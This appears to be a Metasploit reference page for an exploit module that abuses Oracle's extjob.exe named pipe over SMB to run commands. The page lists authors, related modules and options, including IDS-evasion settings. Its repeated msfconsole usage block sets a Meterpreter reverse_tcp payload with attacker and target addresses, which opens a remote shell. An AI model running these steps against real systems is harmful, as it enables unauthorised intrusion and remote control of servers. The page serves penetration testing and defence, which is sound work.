Oracle Job Scheduler Named Pipe Command Execution
This module exploits the Oracle Job Scheduler to execute arbitrary commands. The Job Scheduler is implemented via the component extjob.exe which listens on a named pipe called "orcljsex<SID>" and execute arbitrary commands received over this channel via CreateProcess(). In order to connect to the Named Pipe remotely, SMB access is required. Note that the Job Scheduler is disabled in default installations.
Exploit Rank
- Excellent
Exploit Authors
- David Litchfield < >
- juan vazquez < >
- sinn3r < sinn3r [at] metasploit.com >
Vulnerability References
Exploit Targets
- 0 - Automatic (default)
Exploit Development
Similar Exploit Modules
- exploit/windows/oracle/osb_ndmp_auth
- exploit/windows/oracle/tns_arguments
- exploit/windows/oracle/tns_auth_sesskey
- exploit/windows/oracle/tns_service_name
Exploit Usage Information
$ msfconsole
## ### ## ##
## ## #### ###### #### ##### ##### ## #### ######
####### ## ## ## ## ## ## ## ## ## ## ### ##
####### ###### ## ##### #### ## ## ## ## ## ## ##
## # ## ## ## ## ## ## ##### ## ## ## ## ##
## ## #### ### ##### ##### ## #### #### #### ###
##
msf > use exploit/windows/oracle/extjob
msf exploit(extjob) > show payloads
msf exploit(extjob) > set PAYLOAD windows/meterpreter/reverse_tcp
msf exploit(extjob) > set LHOST [MY IP ADDRESS]
msf exploit(extjob) > set RHOST [TARGET IP]
msf exploit(extjob) > exploit
## ### ## ##
## ## #### ###### #### ##### ##### ## #### ######
####### ## ## ## ## ## ## ## ## ## ## ### ##
####### ###### ## ##### #### ## ## ## ## ## ## ##
## # ## ## ## ## ## ## ##### ## ## ## ## ##
## ## #### ### ##### ##### ## #### #### #### ###
##
msf > use exploit/windows/oracle/extjob
msf exploit(extjob) > show payloads
msf exploit(extjob) > set PAYLOAD windows/meterpreter/reverse_tcp
msf exploit(extjob) > set LHOST [MY IP ADDRESS]
msf exploit(extjob) > set RHOST [TARGET IP]
msf exploit(extjob) > exploit
Exploit Module Options
| RHOST | The target address |
| RPORT | Set the SMB service port (default: 445) |
| SID | The database sid (default: ORCL) |
| CHOST | The local client address |
| CPORT | The local client port |
| ConnectTimeout | Maximum number of seconds to establish a TCP connection |
| ContextInformationFile | The information file that contains context information |
| DECODERSTUB | The VBS base64 file decoder stub to use. |
| DisablePayloadHandler | Disable the handler code for the selected payload |
| EXE::Custom | Use custom exe instead of automatically generating a payload exe |
| EXE::FallBack | Use the default template in case the specified one is missing |
| EXE::Inject | Set to preserve the original EXE function |
| EXE::OldMethod | Set to use the substitution EXE generation method. |
| EXE::Path | The directory in which to look for the executable template |
| EXE::Template | The executable template file name. |
| EnableContextEncoding | Use transient context when encoding payloads |
| NTLM::SendLM | Always send the LANMAN response (except when NTLMv2_session is specified) |
| NTLM::SendNTLM | Activate the 'Negotiate NTLM key' flag, indicating the use of NTLM responses |
| NTLM::SendSPN | Send an avp of type SPN in the ntlmv2 client Blob, this allow authentification on windows Seven/2008r2 when SPN is required |
| NTLM::UseLMKey | Activate the 'Negotiate Lan Manager Key' flag, using the LM key when the LM response is sent |
| NTLM::UseNTLM2_session | Activate the 'Negotiate NTLM2 key' flag, forcing the use of a NTLMv2_session |
| NTLM::UseNTLMv2 | Use NTLMv2 instead of NTLM2_session when 'Negotiate NTLM2' key is true |
| Proxies | Use a proxy chain |
| SMB::ChunkSize | The chunk size for SMB segments, bigger values will increase speed but break NT 4.0 and SMB signing |
| SMB::Native_LM | The Native LM to send during authentication |
| SMB::Native_OS | The Native OS to send during authentication |
| SMB::VerifySignature | Enforces client-side verification of server response signatures |
| SMBDirect | The target port is a raw SMB service (not NetBIOS) |
| SMBDomain | The Windows domain to use for authentication |
| SMBName | The NetBIOS hostname (required for port 139 connections) |
| SMBPass | The password for the specified username |
| SMBUser | The username to authenticate as |
| SSL | Negotiate SSL for outgoing connections |
| SSLVersion | Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1) |
| VERBOSE | Enable detailed status messages |
| WORKSPACE | Specify the workspace for this module |
| WfsDelay | Additional delay when waiting for a session |
| SMB::obscure_trans_pipe_level | Obscure PIPE string in TransNamedPipe (level 0-3) |
| SMB::pad_data_level | Place extra padding between headers and data (level 0-3) |
| SMB::pad_file_level | Obscure path names used in open/create (level 0-3) |
| SMB::pipe_evasion | Enable segmented read/writes for SMB Pipes |
| SMB::pipe_read_max_size | Maximum buffer size for pipe reads |
| SMB::pipe_read_min_size | Minimum buffer size for pipe reads |
| SMB::pipe_write_max_size | Maximum buffer size for pipe writes |
| SMB::pipe_write_min_size | Minimum buffer size for pipe writes |
| TCP::max_send_size | Maxiumum tcp segment size. (0 = disable) |
| TCP::send_delay | Delays inserted before every send. (0 = disable) |